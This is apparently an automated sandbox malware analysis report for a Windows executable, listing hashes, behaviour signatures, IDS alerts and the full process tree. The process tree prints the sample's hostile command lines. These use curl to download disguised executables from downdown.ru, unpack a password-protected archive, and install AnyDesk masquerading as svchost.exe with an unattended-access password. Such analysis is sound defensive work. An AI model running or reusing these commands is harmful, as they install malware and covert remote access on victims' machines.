Edit tour
Windows
Analysis Report
Yv24LkKBY6.exe
Overview
General Information
| Sample name: | Yv24LkKBY6.exerenamed because original name is a hash value |
| Original sample name: | de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617.exe |
| Analysis ID: | 1588958 |
| MD5: | f0aba799546b1ce04037793579de3c94 |
| SHA1: | 3477b56ece979666e4b094534e074f39d52545fe |
| SHA256: | de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617 |
| Tags: | exeuser-adrian__luca |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Disables DEP (Data Execution Prevention) for certain images
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Machine Learning detection for sample
Modifies Group Policy settings
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
Yv24LkKBY6.exe (PID: 7688 cmdline: "C:\Users\ user\Deskt op\Yv24LkK BY6.exe" MD5: F0ABA799546B1CE04037793579DE3C94) 
Acrobat.exe (PID: 7772 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Intel\ 131 .pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 8176 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5900 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 80 --field -trial-han dle=1728,i ,149289839 9657278520 7,96612696 2154739653 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) 
cmd.exe (PID: 7812 cmdline: "C:\Window s\System32 \cmd.exe" /c echo>C :\Intel\re zet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
attrib.exe (PID: 7976 cmdline: "C:\Window s\System32 \attrib.ex e" +s +h C :\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0) - conhost.exe (PID: 8004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8056 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd p ing -n 6 1 27.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8112 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d river.exe http://dow ndown.ru/d river.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7188 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\b lat.exe ht tp://downd own.ru/bla t.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1356 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\s vchost.exe http://do wndown.ru/ svchost.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8080 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\T rays.rar h ttp://down down.ru/Tr ays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5944 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\wol .ps1 http: //downdown .ru/wol.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2716 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\d c.exe http ://downdow n.ru/dc.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1272 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\dr iver.exe x -r -ep2 - hplimpid29 03392 C:\I ntel\Trays .rar C:\In tel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7720 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s tart C:\In tel\Trays\ Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2624 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd s vchost.exe --install C:\Intel\ AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2012 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\cu rl.exe -o C:\Intel\A nyDesk\bat .bat http: //downdown .ru/bat.jp g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1460 cmdline:
"C:\Window s\System32 \cmd.exe" /c echo>> C:\Intel\r ezet.cmd C :\Intel\An yDesk\bat. lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4108 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\rezet.cm d" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7924 cmdline:
ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - curl.exe (PID: 8492 cmdline:
C:\Intel\c url.exe -o C:\Intel\ driver.exe http://do wndown.ru/ driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 8588 cmdline:
C:\Intel\c url.exe -o C:\Intel\ blat.exe h ttp://down down.ru/bl at.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 8616 cmdline:
C:\Intel\c url.exe -o C:\Intel\ svchost.ex e http://d owndown.ru /svchost.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 8680 cmdline:
C:\Intel\c url.exe -o C:\Intel\ Trays.rar http://dow ndown.ru/T rays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 8712 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\wo l.ps1 http ://downdow n.ru/wol.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - curl.exe (PID: 8736 cmdline:
C:\Intel\c url.exe -o C:\Intel\ dc.exe htt p://downdo wn.ru/dc.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - driver.exe (PID: 8764 cmdline:
C:\Intel\d river.exe x -r -ep2 -hplimpid2 903392 C:\ Intel\Tray s.rar C:\I ntel\ /y MD5: 29086D9247FDF40452563C11B3DCA394) 
Trays.exe (PID: 8808 cmdline: "C:\Intel\ Trays\Tray s.exe" -tr ay MD5: 90D208B856DEA18596D57FFB1DD3A867) - 4t-min64.exe (PID: 8836 cmdline:
"C:\Intel\ Trays\4t-m in64.exe" "C:\Intel\ Trays\Shel lEh6055x64 .dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17) - svchost.exe (PID: 8824 cmdline:
svchost.ex e --instal l C:\Intel \AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 8928 cmdline:
"C:\Intel\ svchost.ex e" --local -service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - svchost.exe (PID: 8936 cmdline:
"C:\Intel\ svchost.ex e" --local -control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - curl.exe (PID: 8348 cmdline:
C:\Intel\c url.exe -o C:\Intel\ AnyDesk\ba t.bat http ://downdow n.ru/bat.j pg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4) - cmd.exe (PID: 3556 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Inte l\AnyDesk\ bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 3656 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho QWERTY1 234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - AnyDesk.exe (PID: 5276 cmdline:
AnyDesk.ex e --set-pa ssword _un attended_a ccess MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 5968 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- AnyDesk.exe (PID: 9160 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 5484 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 8208 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --new-in stall MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA) - AnyDesk.exe (PID: 1616 cmdline:
"C:\Intel\ AnyDesk\An yDesk.exe" --crash-h andler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 1676 cmdline:
C:\Windows \System32\ svchost.ex e -k NetSv cs -p -s N caSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 8148 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 8204 cmdline:
C:\Windows \system32\ svchost.ex e -k Local SystemNetw orkRestric ted -s WPD BusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- gpscript.exe (PID: 3184 cmdline:
gpscript.e xe /Refres hSystemPar am MD5: 94FC20DD55459F467A22817CC3B089E5)
- svchost.exe (PID: 8608 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s s eclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: vburov: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T07:39:24.252062+0100 | 2008754 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49882 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T07:39:16.365645+0100 | 2025169 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49829 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T07:39:16.365645+0100 | 2025161 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49829 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Binary or memory string: | memstr_79c078d0-b | |
| Source: | Static PE information: | ||
| Source: | File created: | ||
| Source: | File created: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 43_2_00B8CD06 | |
| Source: | Code function: | 43_2_00B8FCDD | |
| Source: | Code function: | 49_2_0040F8BC | |
| Source: | Code function: | 50_2_045C4400 | |
| Source: | Code function: | 50_2_00407C0E | |
| Source: | Code function: | 50_2_0040DB44 | |
| Source: | Code function: | 50_2_0040DDDC | |
| Source: | Code function: | 51_2_021D4400 | |
| Source: | Code function: | 53_2_021D4400 | |
| Source: | Code function: | 54_2_021D4400 | |
| Source: | Code function: | 50_2_00407D0E | |
| Source: | Code function: | 52_2_00418560 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Network Connect: | ||
| Source: | Image file has PE prefix: | ||